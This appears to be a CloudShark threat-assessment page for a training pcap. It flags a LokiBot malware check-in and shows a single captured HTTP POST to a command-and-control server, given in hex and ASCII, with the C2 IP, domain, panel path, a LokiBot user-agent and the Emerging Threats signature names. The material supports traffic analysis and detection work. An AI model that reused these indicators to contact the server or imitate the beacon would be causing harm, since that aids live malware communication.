CS Personal on cloudshark.org

« Back to Threat Assessment « Previous Threat | Next Threat »

LokiBot Checkin detected in 2017-11-21-traffic-analysis-exercise-2-of-6.pcap

Time	Packet	Protocol	Source	Destination	Additional Threats
2017/11/21 00:13:59 +0000	15193	HTTP / tcp	10.192.1.157:49288	185.118.166.155:80	source \| dest \| ip pair

Payload (272 bytes) show as: hex | ascii | follow stream

00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000A0
000000B0
000000C0
000000D0
000000E0
000000F0
00000100
50 4f 53 54 20 2f 77 70 　2d 61 64 6d 69 6e 2f 63
73 73 2f 63 6f 6c 6f 72 　73 2f 62 6c 75 65 2f 50
61 6e 65 6c 2f 66 69 76 　65 2f 66 72 65 2e 70 68
70 20 48 54 54 50 2f 31 　2e 30 0d 0a 55 73 65 72
2d 41 67 65 6e 74 3a 20 　4d 6f 7a 69 6c 6c 61 2f
34 2e 30 38 20 28 43 68 　61 72 6f 6e 3b 20 49 6e
66 65 72 6e 6f 29 0d 0a 　48 6f 73 74 3a 20 74 63
6f 6f 6c 6f 6e 6c 69 6e 　65 2e 6d 6f 62 69 0d 0a
41 63 63 65 70 74 3a 20 　2a 2f 2a 0d 0a 43 6f 6e
74 65 6e 74 2d 54 79 70 　65 3a 20 61 70 70 6c 69
63 61 74 69 6f 6e 2f 6f 　63 74 65 74 2d 73 74 72
65 61 6d 0d 0a 43 6f 6e 　74 65 6e 74 2d 45 6e 63
6f 64 69 6e 67 3a 20 62 　69 6e 61 72 79 0d 0a 43
6f 6e 74 65 6e 74 2d 4b 　65 79 3a 20 45 41 30 35
35 37 36 34 0d 0a 43 6f 　6e 74 65 6e 74 2d 4c 65
6e 67 74 68 3a 20 32 30 　34 0d 0a 43 6f 6e 6e 65
63 74 69 6f 6e 3a 20 63 　6c 6f 73 65 0d 0a 0d 0a
POST /wp　-admin/c
ss/color　s/blue/P
anel/fiv　e/fre.ph
p HTTP/1　.0..User
-Agent: 　Mozilla/
4.08 (Ch　aron; In
ferno)..　Host: tc
oolonlin　e.mobi..
Accept: 　*/*..Con
tent-Typ　e: appli
cation/o　ctet-str
eam..Con　tent-Enc
oding: b　inary..C
ontent-K　ey: EA05
5764..Co　ntent-Le
ngth: 20　4..Conne
ction: c　lose....
POST /wp-admin/css/colors/blue/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: tcoolonline.mobi
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: EA055764
Content-Length: 204
Connection: close

2 Alerts

Alerts provided by Emerging Threats 2022-04-08

	Signature	Category	SID.rev	Rule Set
1	LokiBot Checkin	Malware Command and Control Activity Detected	2025381.5	ET MALWARE
1	LokiBot User-Agent (Charon/Inferno)	A Network Trojan was detected	2021641.7	ET MALWARE

External References

There are no references available for these alerts.

Community ID

Community ID is an open standard for hashing network flows into identifiers and can be used to correlate connections across different tools.

Zeek: conn.log: 1:AuNn9vwZBdd/aoP9f7+UlmtGdUY=